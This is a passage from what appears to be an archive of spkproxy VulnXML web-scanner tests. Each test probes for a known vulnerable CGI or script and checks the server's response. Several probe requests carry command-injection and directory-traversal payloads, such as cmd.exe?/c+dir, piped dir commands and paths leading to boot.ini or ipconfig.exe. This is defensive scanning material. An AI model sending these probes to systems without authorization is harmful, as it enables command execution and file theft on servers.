description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cfgwiz.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1471.xml0100664000076500007650000000712407566204543021745 0ustar davedave (Cgitest.exe) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}Cgitest.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1472.xml0100664000076500007650000000707207566204543021750 0ustar davedave (cmd.exe?/c+dir) "cmd.exe can execute arbitrary commands" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cmd.exe?/c+dir HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1473.xml0100664000076500007650000000707507566204543021754 0ustar davedave (cmd1.exe?/c+dir) "cmd1.exe can execute arbitrary commands" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cmd1.exe?/c+dir HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1474.xml0100664000076500007650000000706307566204543021752 0ustar davedave (fpsrvadm.exe) "Potentially vulnerable CGI program." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}fpsrvadm.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1475.xml0100664000076500007650000000714307566204543021752 0ustar davedave (hello.bat?&dir+c:\) "This batch file may allow attackers to execute remote commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}hello.bat?&dir+c:\ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1476.xml0100664000076500007650000000725407566204543021756 0ustar davedave (input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\) "This CGI allows attackers to read files from the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot\.ini 200 boot\.ini 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1477.xml0100664000076500007650000000725607566204543021761 0ustar davedave (input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\) "This CGI allows attackers to read files from the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot\.ini 200 boot\.ini 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1478.xml0100664000076500007650000000712607566204543021756 0ustar davedave (mailform.exe) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}mailform.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1479.xml0100664000076500007650000000714607566204543021761 0ustar davedave (ms_proxy_auth_query/) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ms_proxy_auth_query/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1480.xml0100664000076500007650000000712207566204543021743 0ustar davedave (post16.exe) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}post16.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1481.xml0100664000076500007650000000710507566204543021745 0ustar davedave (post32.exe|dir%20c:\) "post32 can execute arbitrary commands" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}post32.exe|dir%20c:\ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1482.xml0100664000076500007650000000711007566204543021742 0ustar davedave (sensepost.exe?/c+dir) "sensepost can execute arbitrary commands" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}sensepost.exe?/c+dir HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1483.xml0100664000076500007650000000707707566204543021757 0ustar davedave (shtml.ddl) "This may allow attackers to retrieve document source." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}shtml.ddl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1484.xml0100664000076500007650000000731007566204543021746 0ustar davedave (SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3) "Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot\.ini 200 boot\.ini 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1485.xml0100664000076500007650000000731007566204543021747 0ustar davedave (stats/statsbrowse.asp?filepath=c:\&Opt=3) "Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}stats/statsbrowse.asp?filepath=c:\&Opt=3 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot\.ini 200 boot\.ini 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1486.xml0100664000076500007650000000725207566204543021755 0ustar davedave (test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\) "This CGI allows attackers to read files from the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot\.ini 200 boot\.ini 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-14.xml0100664000076500007650000000735607566204543021604 0ustar davedave (PRN/../../../../../../../../../WINNT/system32/ipconfig.exe) "Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}PRN/../../../../../../../../../WINNT/system32/ipconfig.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ IP Configuration 200 IP Configuration 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1510.xml0100664000076500007650000001006607566204543021736 0ustar davedave (com5..........................................................................................................................................................................................................................box) "Lotus reveals file system paths when requesting DOS devices with bad syntax." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}com5..........................................................................................................................................................................................................................box HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Execution of Perl script 200 Execution of Perl script 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1511.xml0100664000076500007650000000715607566204543021745 0ustar davedave (com5.java) "Lotus reveals file system paths when requesting DOS devices with bad syntax." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}com5.java HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Execution of 200 Execution of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1512.xml0100664000076500007650000000720207566204543021736 0ustar davedave (com5.pl) "Lotus reveals file system paths when requesting DOS devices with bad syntax." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}com5.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Execution of Perl script 200 Execution of Perl script 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1518.xml0100664000076500007650000000703507566204543021750 0ustar davedave (archie) "Gateway to the unix command 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}archie HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1519.xml0100664000076500007650000000704107566204543021746 0ustar davedave (calendar) "Gateway to the unix command 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}calendar HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1520.xml0100664000076500007650000000704707566204543021744 0ustar davedave (calendar.pl) "Gateway to the unix command 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}calendar.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1521.xml0100664000076500007650000000703107566204543021736 0ustar davedave (date) "Gateway to the unix command 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}date HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1522.xml0100664000076500007650000000703507566204543021743 0ustar davedave (finger) "Gateway to the unix command 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}finger HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1523.xml0100664000076500007650000000703707566204543021746 0ustar davedave (fortune) "Gateway to the unix command 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}fortune HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1524.xml0100664000076500007650000000705707566204543021751 0ustar davedave (jj) "Allows attackers to execute commands as http daemon" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}jj HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1525.xml0100664000076500007650000000711607566204543021746 0ustar davedave (mail) "Simple PERL mailing script to send form data to a pre-configured email address" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}mail HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1526.xml0100664000076500007650000000707007566204543021746 0ustar davedave (nph-error.pl) "Gives more information in error messages" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}nph-error.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1527.xml0100664000076500007650000000705307566204543021750 0ustar davedave (post-query) "Echoes back result of your POST" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}post-query HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1528.xml0100664000076500007650000000704007566204543021745 0ustar davedave (query) "Echoes back result of your GET" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}query HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1529.xml0100664000076500007650000000704307566204543021751 0ustar davedave (redirect) "Redirects via URL from form" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}redirect HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1530.xml0100664000076500007650000000711107566204543021735 0ustar davedave (test-cgi.tcl) "May echo environment variables or give directory listings" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}test-cgi.tcl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1531.xml0100664000076500007650000000710107566204543021735 0ustar davedave (test-env) "May echo environment variables or give directory listings" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}test-env HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1532.xml0100664000076500007650000000703507566204543021744 0ustar davedave (uptime) "Gateway to the unix command 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}uptime HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1533.xml0100664000076500007650000000703707566204543021747 0ustar davedave (wais.pl) "Gateway to the unix command 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}wais.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1554.xml0100664000076500007650000000705407566204543021751 0ustar davedave (.nsconfig) "Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.nsconfig HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: 